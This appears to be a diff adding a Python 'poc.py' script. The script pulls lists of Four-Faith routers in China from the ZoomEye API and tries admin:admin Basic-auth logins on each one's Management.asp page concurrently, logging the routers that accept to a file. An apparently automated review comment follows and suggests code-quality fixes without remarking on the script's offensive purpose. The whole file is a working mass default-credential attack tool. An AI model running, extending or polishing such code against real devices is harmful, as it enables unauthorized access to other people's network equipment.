1+ # @author:九世
2+ # @time:2019/5/25
3+ # @file:poc.py
4+
5+ from gevent import monkey ;monkey .patch_all ()
6+ import gevent
7+ import requests
8+ import sys
9+ from multiprocessing import Process
10+
11+ headers_s = { 'user-agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36' }
12+ login_s = {'Authorization' : 'Basic YWRtaW46YWRtaW4=' }
13+
14+ class Run :
15+ def __init__ (self ,username ,password ):
16+ self .username = username
17+ self .password = password
18+
19+ def exploit (self ,url ):
20+ urls = 'http://{}:8088' .format (url )
21+ try :
22+ rvt = requests .get (url = urls ,headers = headers_s ,timeout = 3 )
23+ if rvt .status_code == 200 and rvt .text != '' :
24+ urls = '{}/Management.asp' .format (str (rvt .url ).rstrip ('/' ))
25+ rbt = requests .get (url = urls ,headers = login_s )
26+ if rbt .status_code == 200 :
27+ print ('[+] Find the default password url:{} username:admin password:admin' .format (rbt .url ))
28+ print ('url:{} username:admin password:admin' .format (rbt .url ),file = open ('save.txt' ,'a' ))
29+
30+ except :
31+ pass
32+
33+ def xc (self ,xt ):
34+ gv = []
35+ for x in xt :
36+ gv .append (gevent .spawn (self .exploit ,x ))
37+ print ('[+] Detection and survival' )
38+ gevent .joinall (gv )
39+ print ('[+] Survival URLs are stored in:{}/save.txt' .format (sys .argv [0 ]).replace ('/poc.py' ,'' ))
40+
41+
42+ def djc (self ,lt ):
43+ rg = []
44+ calc = 0
45+ shu = len (lt )
46+ for l in lt :
47+ if calc == shu :
48+ p = Process (target = self .xc ,args = (rg ,))
49+ p .start ()
50+ rg .clear ()
51+ calc = 0
52+ rg .append (l )
53+ calc += 1
54+
55+ if len (rg )> 0 :
56+ p = Process (target = self .xc , args = (rg ,))
57+ p .start ()
58+
59+ def zoomeye (self ):
60+ page = 11
61+ iplist = []
62+ url = 'https://api.zoomeye.org/user/login'
63+ data = {'username' :self .username ,'password' :self .password }
64+ rqt = requests .post (url = url ,json = data )
65+ if rqt .json ()['access_token' ]:
66+ print ('[+] Log in to zoomeye successfully' )
67+ access_token = rqt .json ()['access_token' ]
68+ print ('[+] access_token:{}' .format (access_token ))
69+ print ('[+] Get IP page:{}' .format (page ))
70+ for p in range (1 ,page ):
71+ url = 'https://api.zoomeye.org/host/search?query=app%3A"Four-Faith"%20%2Bcountry%3A"CN"%20%2Bport%3A8088%20ver%3A"v2.0.0"%20%2Bapp%3A"Four-Faith%20router%20httpd"&page={}' .format (p )
72+ headers = {'Authorization' :'JWT {}' .format (access_token )}
73+ rqt2 = requests .get (url = url ,headers = headers )
74+ matches = rqt2 .json ()['matches' ]
75+ for m in matches :
76+ iplist .append (m ['ip' ])
77+
78+ self .djc (iplist )
79+ else :
80+ print ('[-] Login zoomeye failed' )
81+ exit ()
82+
83+ if __name__ == '__main__' :
84+ username = 'zoomeye_username'
85+ password = 'zoomeye_password'
86+ obj = Run (username = username ,password = password )
87+ obj .zoomeye ()
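Review bot: The ZoomEye token is written out in full by `print ('[+] access_token:{}' .format (access_token ))` in `zoomeye`, so a live bearer credential ends up in terminal scrollback and any captured output; drop the line or report only that a token was obtained. The `__main__` block assigns `username` and `password` as string literals, which invites committing real account credentials; reading them from the environment (for example `os.environ['ZOOMEYE_USERNAME']`, a variable name constructed here for illustration) keeps them out of the repository. In `exploit`, the bare `except :` followed by `pass` hides every failure including programming errors, the second `requests .get` has no `timeout`, and the handle from `open ('save.txt' ,'a' )` is never closed; catching `requests.RequestException`, passing `timeout = 3` as the first call does, and writing inside a `with open(...)` block would cover all three. `rqt .json ()['access_token' ]` would also raise `KeyError` rather than reach the `else` branch if a failed login response carries no such key, so `rqt .json ().get ('access_token' )` is the safer test.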